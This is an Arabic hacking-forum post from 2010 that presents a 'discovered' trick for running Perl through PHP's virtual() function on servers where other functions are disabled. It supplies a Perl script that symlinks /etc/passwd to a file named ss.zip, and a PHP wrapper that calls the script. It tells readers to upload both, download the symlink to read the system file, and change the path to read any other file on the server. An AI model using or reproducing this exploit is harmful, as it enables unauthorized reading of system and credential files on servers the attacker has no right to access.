عرض مشاركة واحدة
قديم 06-12-2010, 05:28 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
S4udi h4ck
katem
 
الصورة الرمزية S4udi h4ck
 

 

 
إحصائية العضو








S4udi h4ck غير متواجد حالياً

إرسال رسالة عبر MSN إلى S4udi h4ck إرسال رسالة عبر Skype إلى S4udi h4ck

 

 

إحصائية الترشيح

عدد النقاط : 10
S4udi h4ck is on a distinguished road

. [حصريآ]تشغيل البيرل بأحد دوال php


السلام عليكم ورحمة الله وبركاته

كيف الحال ياعيال إن شاء الله بخير ...

دالة virtual

هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي

طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل

هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html

لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن

الدوال الغير مفعله ...

راح اعطيكم كود تضعونه بملف بيرل



كود PHP:
[html] #!/usr/bin/perl -w


$target="/etc/passwd";


$distension ="ss.zip";


print "Content-type: ****/html\n\n";


print '<**** ****="#C0C0C0" bgcolor="#000000">';


$symlink = symlink($target,$distension);


if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; }


else { print "Cannot Symlink File or File $distension Already Exists[/html] . . ."; }




زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink


لملف /etc/passwd بملف اسمه ss.zip

ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl

وتنشأ ملف php بإستخدام دالة virtual

كود PHP:
<?php


virtual("./ss.pl");


?>

ارفع ملف الـ php على نفس مسار ملف البيرل


وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره




راح يقول

ss.zip Symlink Created Successfully

حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd

الملف في المرافقه

بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...

و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...

و إن شاء الله يكون الشرح مفهوم للجميع ..


أهداء الي منظمة : kala$nikoV
smilies15

و بالتوفيق ...
G0D-FaTH3R



FpwvdNDjaydg hgfdvg fHp] ],hg php

الملفات المرفقة
نوع الملف: txt ss.txt‏ (360 بايت, المشاهدات 13)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

التعديل الأخير تم بواسطة KaLa$nikoV ; 06-14-2010 الساعة 03:33 PM.

   

رد مع اقتباس